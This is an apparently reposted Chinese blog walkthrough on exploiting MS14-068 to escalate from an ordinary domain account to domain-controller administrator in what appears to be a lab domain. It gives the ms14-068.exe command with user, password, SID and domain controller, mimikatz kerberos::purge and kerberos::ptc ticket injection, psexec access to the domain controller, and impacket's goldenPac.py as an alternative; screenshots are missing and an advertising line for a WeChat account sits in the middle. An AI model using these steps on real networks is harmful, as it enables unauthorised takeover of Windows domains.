ms14-068提权

工具利用

a)拿下边界机win7,并已经有win7上任意一个账号的密码

-u 用户名@域

-p 用户密码

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

-s 用户sid

-d 域控

ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com

生成一个ccache后缀票据

MS14-068提权和impacket工具包提权 Safe 第1张

导入票据

导入之前,清空票据缓存

kerberos::purge

kerberos::ptc 票据

MS14-068提权和impacket工具包提权 Safe 第2张

使用psexec工具连接win08(域控机器)尝试执行命令,看到的权限是test3的,但是实际上所属已经是win08上,并且是最高权限

MS14-068提权和impacket工具包提权 Safe 第3张

impacket工具包提权

b) 没拿到边界机,但是有账号密码的情况

使用/impacket/examples下的goldenpac.py脚本

MS14-068提权和impacket工具包提权 Safe 第4张

注意@domain-host 指的是域控机的位置

MS14-068提权和impacket工具包提权 Safe 第5张

成功进入win08的命令行模式

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄